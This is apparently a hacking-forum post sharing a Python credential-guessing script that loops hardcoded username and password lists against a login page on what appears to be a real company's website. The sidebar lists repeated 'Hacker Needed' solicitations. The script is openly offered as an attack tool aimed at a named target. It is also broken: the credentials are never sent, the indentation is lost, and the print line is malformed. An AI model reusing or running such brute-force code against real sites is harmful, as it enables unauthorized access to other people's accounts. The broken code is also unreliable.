Admin- Admin
- Posts : 474
Reputation : 8
Join date : 2014-12-10
Age : 32
Location : Pakistan
by Admin Wed Mar 04, 2015 2:13 pm
- Code:
[color=#EEEEEE][size=16]#!Script used to dictionary attack login, widely available on the net, unknown author!
import urllib2
users = ("admin", "administrator", "Admin", "Administrator", "admin123", "administrator123", "Admin123", "Administrator123", "User123", "user123", "Support", "support", "server", "root", "manager", "Manager", "Scanner", "Scanner", "SysAdmin", "sysAdmin", "Sysadmin", "sysadmin", "Sysadministrator", "sysadministrator1", "sysadministrator", "user1", "User1", "User2", "user2", "User3", "user3", "SuperUser", "superUser", "Superuser", "SuperUser1", "SuperAdmin1", "Sheffield1", "sheffield1", "Sheffield01", "sheffield01")
passwords = ("admin", "administrator", "Admin", "Administrator", "jessica", "Jesica", "John", "john", "Root", "root", "Support", "support", "Support1", "support1", "User1", "user1", "User2", "user2", "User3", "user3", "Password", "password", "P@ssW0rd", "p@ssW0rd", "PassW0rd", "passW0rd", "P@$$W0rd", "p@$$W0rd", "P@$$word", "p@$$word", "UserAdmin", "useradmin", "userAdmin", "useradministrator", "UserAdministrator", "AdminUser", "adminUser", "adminuser", "Manaer1", "manager1", "Manager01", "manager01", "Admin01", "admin01", "Administrator01", "administrator01", "Sheffield1", "sheffield1", "Sheffield01", "Sheffield01")
for user in users:
for password in passwords:
url = "http://www.sheffieldtilecompany.co.uk/restricted/login.php"
req = urllib2.Request(url)
req.add_header("Cookie", "PHPSESSID=enter cookieid here;security=low")
response = urllib2.urlopen(req)
html = response.read()
if "failed to login" not in html:
print "Working combination --- %s : %s" (user, password)
[/size][/color]
Sat Apr 29, 2017 10:50 am by ubedullah
» Group hackers
Sat Apr 15, 2017 2:37 pm by Group Hackers
» Hacker Needed
Sat Apr 15, 2017 3:57 am by Group Hackers
» Hacker Needed
Sat Apr 15, 2017 1:45 am by Group Hackers
» Hacker Needed
Thu Apr 13, 2017 11:10 pm by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:07 pm by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:21 am by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 2:06 am by Group Hackers
» Hacker Needed
Tue Apr 11, 2017 1:35 am by Group Hackers